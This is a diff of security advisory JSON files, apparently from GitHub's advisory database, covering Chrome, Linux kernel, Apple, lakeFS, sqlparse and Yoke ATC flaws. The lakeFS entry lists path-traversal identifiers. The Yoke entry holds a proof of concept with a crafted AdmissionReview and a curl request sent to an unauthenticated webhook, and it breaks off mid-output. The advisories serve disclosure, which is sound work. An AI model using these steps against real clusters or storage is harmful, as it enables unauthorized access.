b/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hpj8-5pv7-f58m", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-11T21:30:40Z", "aliases": [ "CVE-2026-2321" ], "details": "Use after free in Ozone in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -27,7 +32,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T19:15:52Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json b/advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json new file mode 100644 index 0000000000000..811f6456fe8f4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jh9m-9mr6-3ghc", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2026-23111" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate()\n\nnft_map_catchall_activate() has an inverted element activity check\ncompared to its non-catchall counterpart nft_mapelem_activate() and\ncompared to what is logically required.\n\nnft_map_catchall_activate() is called from the abort path to re-activate\ncatchall map elements that were deactivated during a failed transaction.\nIt should skip elements that are already active (they don't need\nre-activation) and process elements that are inactive (they need to be\nrestored). Instead, the current code does the opposite: it skips inactive\nelements and processes active ones.\n\nCompare the non-catchall activate callback, which is correct:\n\n nft_mapelem_activate():\n if (nft_set_elem_active(ext, iter->genmask))\n return 0; /* skip active, process inactive */\n\nWith the buggy catchall version:\n\n nft_map_catchall_activate():\n if (!nft_set_elem_active(ext, genmask))\n continue; /* skip inactive, process active */\n\nThe consequence is that when a DELSET operation is aborted,\nnft_setelem_data_activate() is never called for the catchall element.\nFor NFT_GOTO verdict elements, this means nft_data_hold() is never\ncalled to restore the chain->use reference count. Each abort cycle\npermanently decrements chain->use. Once chain->use reaches zero,\nDELCHAIN succeeds and frees the chain while catchall verdict elements\nstill reference it, resulting in a use-after-free.\n\nThis is exploitable for local privilege escalation from an unprivileged\nuser via user namespaces + nftables on distributions that enable\nCONFIG_USER_NS and CONFIG_NF_TABLES.\n\nFix by removing the negation so the check matches nft_mapelem_activate():\nskip active elements, process inactive ones.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23111" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1444ff890b4653add12f734ffeffc173d42862dd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/42c574c1504aa089a0a142e4c13859327570473d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8b68a45f9722f2babe9e7bad00aa74638addf081" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8c760ba4e36c750379d13569f23f5a6e185333f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b9b6573421de51829f7ec1cce76d85f5f6fbbd7f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f41c5d151078c5348271ffaf8e7410d96f2d82f8" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json b/advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json new file mode 100644 index 0000000000000..20a23f7f6b607 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjrf-jfrm-p64x", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2026-23112" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-tcp: add bounds checks in nvmet_tcp_build_pdu_iovec\n\nnvmet_tcp_build_pdu_iovec() could walk past cmd->req.sg when a PDU\nlength or offset exceeds sg_cnt and then use bogus sg->length/offset\nvalues, leading to _copy_to_iter() GPF/KASAN. Guard sg_idx, remaining\nentries, and sg->length/offset before building the bvec.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23112" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/043b4307a99f902697349128fde93b2ddde4686c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1385be357e8acd09b36e026567f3a9d5c61139de" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/19672ae68d52ff75347ebe2420dde1b07adca09f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/42afe8ed8ad2de9c19457156244ef3e1eca94b5d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/52a0a98549344ca20ad81a4176d68d28e3c05a5c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ab200d71553bdcf4de554a5985b05b2dd606bc57" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/dca1a6ba0da9f472ef040525fab10fd9956db59f" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json index f1b4fbd1723f2..1c90d7d688765 100644 --- a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json +++ b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json @@ -54,7 +54,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-125" + "CWE-125", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json b/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json new file mode 100644 index 0000000000000..3e77fd03b44d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3vc-646j-prpq", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2025-14349" + ], + "details": "Privilege Defined With Unsafe Actions, Missing Authentication for Critical Function vulnerability in Universal Software Inc. FlexCity/Kiosk allows Accessing Functionality Not Properly Constrained by ACLs, Privilege Escalation.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14349" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0065" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-267" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json index 01e122e5c3ef9..1d4011263dfdb 100644 --- a/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json +++ b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r5cf-37x9-4hgv", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-13T15:30:24Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20658" ], "details": "A package validation issue was addressed by blocking the vulnerable package. This issue is fixed in macOS Tahoe 26.3. An app may be able to gain root privileges.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json index c3e366958502c..bd082985f53f7 100644 --- a/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json +++ b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rp46-r563-jrc7", - "modified": "2026-02-13T12:31:21Z", + "modified": "2026-02-13T15:30:25Z", "published": "2026-02-13T12:31:21Z", "aliases": [ "CVE-2025-33042" @@ -17,6 +17,10 @@ { "type": "WEB", "url": "https://lists.apache.org/thread/fy88wmgf1lj9479vrpt12cv8x73lroj1" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/12/2" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json index 825e2b9640018..a0236b79690b7 100644 --- a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json +++ b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wp4v-6rrv-wqv9", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-13T15:30:24Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20655" ], "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json index f64c8a37255a3..ceb4a2d258e16 100644 --- a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json +++ b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wxwg-9693-mqg4", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-13T15:30:24Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20656" ], "details": "A logic issue was addressed with improved validation. This issue is fixed in iOS 18.7.5 and iPadOS 18.7.5, Safari 26.3, macOS Tahoe 26.3. An app may be able to access a user's Safari history.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -29,7 +34,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json b/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json new file mode 100644 index 0000000000000..877ed83397513 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgwv-vx48-69hc", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2026-1619" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Universal Software Inc. FlexCity/Kiosk allows Exploitation of Trusted Identifiers.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1619" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0065" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:10Z" + } +} \ No newline at end of file From d14188d18e8e098c25df31407d6032dc397d499c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 16:17:56 +0000 Subject: [PATCH 062/215] Publish Advisories GHSA-27jp-wm6q-gp25 GHSA-699m-4v95-rmpm --- .../GHSA-27jp-wm6q-gp25.json | 66 ++++++++++++++++++ .../GHSA-699m-4v95-rmpm.json | 68 +++++++++++++++++++ 2 files changed, 134 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json diff --git a/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json new file mode 100644 index 0000000000000..e6959febeead2 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27jp-wm6q-gp25", + "modified": "2026-02-13T16:16:11Z", + "published": "2026-02-13T16:16:11Z", + "aliases": [], + "summary": "sqlparse: formatting list of tuples leads to denial of service", + "details": "### Summary\nThe below gist hangs while attempting to format a long list of tuples.\n\nThis was found while [drafting a regression test for Dja\nngo 5.2's composite primary key feature](https://code.djangoproject.com/ticket/36416#comment:3), which allows querying composite fields with tuples.\n\n###", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "sqlparse" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.5.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.5.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-27jp-wm6q-gp25" + }, + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/commit/40ed3aa958657fa4a82055927fa9de70ab903360" + }, + { + "type": "PACKAGE", + "url": "https://github.com/andialbrecht/sqlparse" + }, + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/releases/tag/0.5.4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-13T16:16:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json new file mode 100644 index 0000000000000..32fa774fc8cb7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-699m-4v95-rmpm", + "modified": "2026-02-13T16:16:04Z", + "published": "2026-02-13T16:16:04Z", + "aliases": [ + "CVE-2026-26187" + ], + "summary": "lakeFS vulnerable to path traversal in local block adapter allow cross-namespace and sibling directory access", + "details": "## Summary\n\nTwo path traversal vulnerabilities in the local block adapter allow authenticated users to read and write files outside their designated storage boundaries.\n\n## Details\n\nThe local block adapter in `pkg/block/local/adapter.go` had two path traversal vulnerabilities:\n\n### 1. Prefix Bypass Vulnerability\n\nThe `verifyRelPath` function used `strings.HasPrefix()` to verify that requested paths fall within the configured storage directory. This check was insufficient because it validated only the path prefix without requiring a path separator, allowing access to sibling directories with similar names.\n\n**Example:** If the adapter is configured with base path `/data/lakefs`:\n\n| Path | Expected | Actual |\n|------|----------|--------|\n| `/data/lakefs/valid/file.txt` | Allowed | Allowed |\n| `/data/lakefs_evil/secret.txt` | Blocked | **Vulnerable** |\n| `/data/lakefs_backup/data.db` | Blocked | **Vulnerable** |\n\n### 2. Namespace Escape via Identifier\n\nThe adapter verified that resolved paths stayed within the adapter's base path, but did not verify that object identifiers stayed within their designated storage namespace. This allowed attackers to use path traversal sequences in the object identifier to access files in other namespaces.\n\n**Example:** With base path `/data/lakefs` and namespace `local://repo1/userdata`:\n\n| Identifier | Resolved Path | Expected | Actual |\n|------------|---------------|----------|--------|\n| `file.txt` | `/data/lakefs/repo1/userdata/file.txt` | Allowed | Allowed |\n| `../secrets/key.txt` | `/data/lakefs/repo1/secrets/key.txt` | Blocked | **Vulnerable** |\n| `../../other-repo/data.txt` | `/data/lakefs/other-repo/data.txt` | Blocked | **Vulnerable** |\n\nThis vulnerability allows users with access to one namespace to read and write files in other namespaces within the same lakeFS deployment.\n\n## Impact\n\nAuthenticated lakeFS users can:\n\n- **Read and write files in sibling directories** that share the same path prefix as the storage directory (vulnerability 1)\n- **Access files across namespaces** by using path traversal in object identifiers (vulnerability 2)\n\nThis could allow attackers to:\n\n- Read sensitive data from other repositories/namespaces\n- Write malicious files to other namespaces\n- Read/write files in adjacent directories outside lakeFS storage\n- Potentially escalate privileges if writable directories are used by other services\n\nThis vulnerability **only affects** deployments using the local block adapter. Deployments using S3, GCS, Azure, or other object storage backends are **not affected**.\n\n## Patches\n\nFixed in version v1.77.0.\n\nThe fixes:\n1. Append a path separator to prefix checks, ensuring paths must be within the storage directory\n2. Add two-level path validation: verify both that namespace paths stay within the adapter's base path AND that resolved paths stay within their designated namespace\n\n## Workarounds\n\n- Configure the storage path with a unique name unlikely to be a prefix of other directories\n- Restrict filesystem permissions for the lakeFS process\n- Ensure no sensitive data exists in sibling directories\n\n## Credit\n\nDiscovered via CodeQL static analysis.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/treeverse/lakefs" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.77.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.76.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/treeverse/lakeFS/security/advisories/GHSA-699m-4v95-rmpm" + }, + { + "type": "WEB", + "url": "https://github.com/treeverse/lakeFS/commit/cbc106275357302a834280f133265dc39f1384ce" + }, + { + "type": "PACKAGE", + "url": "https://github.com/treeverse/lakeFS" + }, + { + "type": "WEB", + "url": "https://github.com/treeverse/lakeFS/releases/tag/v1.77.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-13T16:16:04Z", + "nvd_published_at": null + } +} \ No newline at end of file From 8de3c83068cc825555fc753979042e7bcd884076 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 17:17:07 +0000 Subject: [PATCH 063/215] Publish Advisories GHSA-33mh-2634-fwr2 GHSA-87fh-rc96-6fr6 GHSA-965m-v4cc-6334 GHSA-jr94-gj3h-c8rf GHSA-p6pv-q7rc-g4h9 GHSA-wj8p-jj64-h7ff --- .../GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json | 2 +- .../GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json | 6 +++++- .../GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json | 15 ++++++++++++--- .../GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json | 8 ++++++-- .../GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json | 6 +++++- .../GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json | 8 ++++++-- 6 files changed, 35 insertions(+), 10 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json index a06c125cd8919..c2459ea5cf20f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json +++ b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33mh-2634-fwr2", - "modified": "2026-02-12T14:22:46Z", + "modified": "2026-02-13T17:16:36Z", "published": "2026-02-09T20:37:05Z", "aliases": [ "CVE-2026-25765" diff --git a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json index b654c6ebe59a7..277f68bdc730a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json +++ b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-87fh-rc96-6fr6", - "modified": "2026-02-07T00:32:04Z", + "modified": "2026-02-13T17:16:07Z", "published": "2026-02-05T21:19:30Z", "aliases": [ "CVE-2026-25758" @@ -140,6 +140,10 @@ "type": "WEB", "url": "https://github.com/spree/spree/commit/ff7cfcfcfe0c40c60d03317e1d0ee361c6a6b054" }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_api/CVE-2026-25758.yml" + }, { "type": "PACKAGE", "url": "https://github.com/spree/spree" diff --git a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json index d2ecb5f8b36fb..3abcd13dcb9ec 100644 --- a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json +++ b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-965m-v4cc-6334", - "modified": "2026-02-12T22:06:36Z", + "modified": "2026-02-13T17:15:36Z", "published": "2026-02-12T22:06:36Z", "aliases": [ "CVE-2026-26055" ], "summary": "Unauthenticated Admission Webhook Endpoints in Yoke ATC", "details": "# Unauthenticated Admission Webhook Endpoints in Yoke ATC\n\nThis vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.\n\n**Recommended CWE**: CWE-306 (Missing Authentication for Critical Function)\n\n## Summary\n\nYoke ATC implements multiple Admission Webhook endpoints (`/validations/{airway}`, `/validations/resources`, `/validations/flights.yoke.cd`, `/validations/airways.yoke.cd`, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server's authentication and authorization mechanisms.\n\n## Details\n\nThe vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.\n\n**Vulnerable Endpoint Handlers** (`cmd/atc/handler.go:147-335`):\n```go\nmux.HandleFunc(\"POST /validations/{airway}\", func(w http.ResponseWriter, r *http.Request) {\n var review admissionv1.AdmissionReview\n if err := json.NewDecoder(r.Body).Decode(&review); err != nil {\n http.Error(w, fmt.Sprintf(\"failed to decode review: %v\", err), http.StatusBadRequest)\n return\n }\n // No authentication check - request is processed directly\n // ...\n})\n```\n\n**Additional Unauthenticated Endpoints**:\n- `/validations/resources` (`cmd/atc/handler.go:337-538`)\n- `/validations/external-resources` (`cmd/atc/handler.go:540-597`)\n- `/validations/airways.yoke.cd` (`cmd/atc/handler.go:599-636`)\n- `/validations/flights.yoke.cd` (`cmd/atc/handler.go:638-733`)\n- `/crdconvert/{airway}` (`cmd/atc/handler.go:61-145`)\n\nThe code lacks:\n1. TLS client certificate verification\n2. Request source validation (verifying requests come from kube-apiserver)\n3. Any form of authentication middleware\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites**:\n- Docker installed and running\n- kubectl installed\n- Go 1.21+ installed\n- kind installed\n\n**Step 1: Create Kind cluster**\n```bash\ncat > /tmp/kind-config.yaml << 'EOF'\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: yoke-vuln-test\nnodes:\n- role: control-plane\nEOF\n\nkind create cluster --config /tmp/kind-config.yaml\n```\n\n**Step 2: Build and install Yoke CLI**\n```bash\ngit clone https://github.com/yokecd/yoke.git\ncd yoke\nGOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke\n```\n\n**Step 3: Deploy ATC**\n```bash\n/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest\n```\n\n**Step 4: Deploy Backend Airway example**\n```bash\n/tmp/yoke takeoff -wait 60s backendairway \"https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz\"\n```\n\n### Exploitation Steps\n\n**Step 1: Create attacker pod**\n```bash\nkubectl apply -f - < /tmp/malicious-review.json << 'EOF'\n{\n \"apiVersion\": \"admission.k8s.io/v1\",\n \"kind\": \"AdmissionReview\",\n \"request\": {\n \"uid\": \"vul002-exploit-uid\",\n \"kind\": {\"group\": \"examples.com\", \"version\": \"v1\", \"kind\": \"Backend\"},\n \"resource\": {\"group\": \"examples.com\", \"version\": \"v1\", \"resource\": \"backends\"},\n \"name\": \"exploit-backend\",\n \"namespace\": \"default\",\n \"operation\": \"CREATE\",\n \"userInfo\": {\"username\": \"attacker-from-pod\", \"groups\": [\"system:unauthenticated\"]},\n \"object\": {\n \"apiVersion\": \"examples.com/v1\",\n \"kind\": \"Backend\",\n \"metadata\": {\"name\": \"exploit-backend\", \"namespace\": \"default\"},\n \"spec\": {\"image\": \"nginx:latest\", \"replicas\": 1}\n }\n }\n}\nEOF\n\nkubectl cp /tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json\n```\n\nSend the request:\n```bash\nkubectl exec webhook-attacker -- curl -k -s -X POST \\\n https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \\\n -H \"Content-Type: application/json\" \\\n -d @/tmp/malicious-review.json\n```\n\nActual output from 